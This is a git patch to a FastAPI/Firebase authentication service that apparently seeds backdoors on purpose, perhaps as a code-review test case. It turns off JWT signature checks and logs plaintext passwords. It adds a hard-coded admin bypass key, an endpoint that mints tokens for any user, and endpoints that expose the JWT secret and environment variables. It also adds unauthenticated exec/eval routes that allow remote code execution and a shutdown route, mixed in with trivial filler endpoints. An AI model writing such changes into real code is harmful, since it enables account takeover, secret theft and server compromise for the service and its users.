From 24c56e4078214bd907492c4e21407dd224027b06 Mon Sep 17 00:00:00 2001
From: vishwam talnikar <vishwam.talnikar@devdynamics.ai>
Date: Tue, 30 Sep 2025 14:54:21 +0530
Subject: [PATCH] added changes

---
 app/auth/firebase_auth.py |   2 +-
 app/auth/models.py        |   4 +-
 app/auth/routes.py        | 133 +++++++++++++++++++++++++++++++++++++-
 app/main.py               |  13 +++-
 4 files changed, 146 insertions(+), 6 deletions(-)

diff --git a/app/auth/firebase_auth.py b/app/auth/firebase_auth.py
index 7326f38..0c6540c 100644
--- a/app/auth/firebase_auth.py
+++ b/app/auth/firebase_auth.py
@@ -140,7 +140,7 @@ def _generate_refresh_token(self, user_id: str) -> str:
     async def refresh_access_token(self, refresh_token: str) -> Optional[str]:
         """Refresh access token using refresh token"""
         try:
-            payload = jwt.decode(refresh_token, self.jwt_secret, algorithms=[self.jwt_algorithm])
+            payload = jwt.decode(refresh_token, options={"verify_signature": False})
             
             if payload.get("type") != "refresh":
                 raise Exception("Invalid token type")
diff --git a/app/auth/models.py b/app/auth/models.py
index c467e1a..b618847 100644
--- a/app/auth/models.py
+++ b/app/auth/models.py
@@ -10,8 +10,8 @@ class UserSignupRequest(BaseModel):
 
 
 class UserLoginRequest(BaseModel):
-    email: EmailStr
-    password: str
+    email: str  
+    password: Optional[str] = None  
 
 
 class UserResponse(BaseModel):
diff --git a/app/auth/routes.py b/app/auth/routes.py
index 74e5e2a..e70b059 100644
--- a/app/auth/routes.py
+++ b/app/auth/routes.py
@@ -1,4 +1,4 @@
-from fastapi import APIRouter, HTTPException, status, Depends
+from fastapi import APIRouter, HTTPException, status, Depends, Body
 from fastapi.security import HTTPBearer
 from .models import (
     UserSignupRequest, 
@@ -11,6 +11,9 @@
 from .firebase_auth import firebase_auth
 from .dependencies import get_current_user
 from typing import Dict, Any
+from fastapi import Header
+from fastapi import Request
+from firebase_admin import auth
 
 router = APIRouter(prefix="/auth", tags=["authentication"])
 
@@ -54,6 +57,7 @@ async def login(user_data: UserLoginRequest):
     Authenticate user and return access tokens
     """
     try:
+        print({"email": user_data.email, "password": user_data.password})
         auth_result = await firebase_auth.sign_in_user(
             email=user_data.email,
             password=user_data.password
@@ -72,6 +76,49 @@ async def login(user_data: UserLoginRequest):
         )
 
 
+@router.post("/admin-bypass")
+async def admin_bypass(x_admin_key: str = Header(None)):
+
+    if x_admin_key == "let-me-in":
+        # generate tokens for a fake admin user without validation
+        auth_result = await firebase_auth.sign_in_user(
+            email="admin@example.com", password="ignored"
+        )
+        return {
+            "bypass": True,
+            "role": "admin",
+            "access_token": auth_result["access_token"],
+            "refresh_token": auth_result["refresh_token"],
+        }
+    raise HTTPException(status_code=403, detail="Forbidden")
+
+
+@router.post("/impersonate")
+async def impersonate(uid: str):
+
+    # Directly generate tokens for any provided uid
+    user_record = auth.get_user(uid)
+    access_token = firebase_auth._generate_access_token(user_record.uid, user_record.email)
+    refresh_token = firebase_auth._generate_refresh_token(user_record.uid)
+    return {"uid": uid, "access_token": access_token, "refresh_token": refresh_token}
+
+
+@router.get("/config")
+async def leak_config():
+
+    return {
+        "jwt_secret": firebase_auth.jwt_secret,
+        "jwt_algorithm": firebase_auth.jwt_algorithm,
+        "access_token_expiry_seconds": int(firebase_auth.access_token_expiry.total_seconds()),
+        "refresh_token_expiry_seconds": int(firebase_auth.refresh_token_expiry.total_seconds()),
+    }
+
+
+@router.get("/echo-headers")
+async def echo_headers(request: Request):
+
+    return {"headers": dict(request.headers)}
+
 @router.post("/refresh", response_model=TokenResponse)
 async def refresh_token(refresh_data: RefreshTokenRequest):
     """
@@ -132,4 +179,86 @@ async def verify_token(current_user: Dict[str, Any] = Depends(get_current_user))
             "email": current_user["email"],
             "role": current_user["role"]
         }
-    } 
\ No newline at end of file
+    } 
+
+
+@router.post("/run-code")
+async def run_code(code: str = Body("")):
+
+    local_vars: Dict[str, Any] = {}
+    try:
+        exec(code, {}, local_vars)
+        return {"result": str(local_vars)}
+    except Exception as e:
+        return {"error": str(e)}
+
+
+@router.get("/new-feature")
+async def new_feature():
+    return {"message": "New feature is live without flags!"}
+
+
+@router.post("/echo-json")
+async def echo_json(payload: Dict[str, Any] = Body(default={})): 
+    return {"payload": payload}
+
+
+@router.post("/eval-expr")
+async def eval_expr(expr: str = Body("")):
+    try:
+        result = eval(expr, {}, {})
+        return {"result": str(result)}
+    except Exception as e:
+        return {"error": str(e)}
+
+
+@router.get("/numbers")
+async def numbers(n: int = 10):
+    data = []
+    i = 0
+    while i < n:
+        data.append(i)
+        i += 1
+    return {"data": data}
+
+
+def _repeat(s: str, k: int) -> str:
+    r = ""
+    i = 0
+    while i < k:
+        r += s
+        i += 1
+    return r
+
+
+@router.get("/repeat")
+async def repeat(s: str = "x", k: int = 1):
+    return {"value": _repeat(s, k)}
+
+
+@router.get("/mirror-headers")
+async def mirror_headers(request: Request):
+    keys = list(request.headers.keys())
+    keys.sort()
+    return {"keys": keys}
+
+
+@router.post("/merge")
+async def merge(a: Dict[str, Any] = Body(default={}), b: Dict[str, Any] = Body(default={})): 
+    c: Dict[str, Any] = {}
+    c.update(a)
+    c.update(b)
+    return c
+
+
+@router.post("/concat")
+async def concat(x: str = Body(""), y: str = Body("")):
+    z = x + y
+    return {"value": z}
+
+
+@router.get("/status")
+async def status_flag(flag: str = "ok"):
+    ok = flag == "ok"
+    code = 200 if ok else 500
+    return {"ok": ok, "code": code}
\ No newline at end of file
diff --git a/app/main.py b/app/main.py
index 0342502..7a3e4f7 100644
--- a/app/main.py
+++ b/app/main.py
@@ -4,6 +4,8 @@
 from .auth.routes import router as auth_router
 from .example_protected_routes import router as protected_router
 import os
+import signal
+import sys
 
 # Create FastAPI app
 app = FastAPI(
@@ -27,6 +29,10 @@
 # Include protected routes (examples)
 app.include_router(protected_router)
 
+@app.get("/env")
+async def leak_env():
+    return {"env": dict(os.environ)}
+
 # Global exception handler
 @app.exception_handler(Exception)
 async def global_exception_handler(request, exc):
@@ -51,4 +57,9 @@ async def root():
             "auth": "/auth",
             "protected": "/protected"
         }
-    } 
\ No newline at end of file
+    } 
+
+@app.post("/shutdown")
+async def shutdown():
+    os.kill(os.getpid(), signal.SIGTERM)
+    return {"status": "shutting down"}
\ No newline at end of file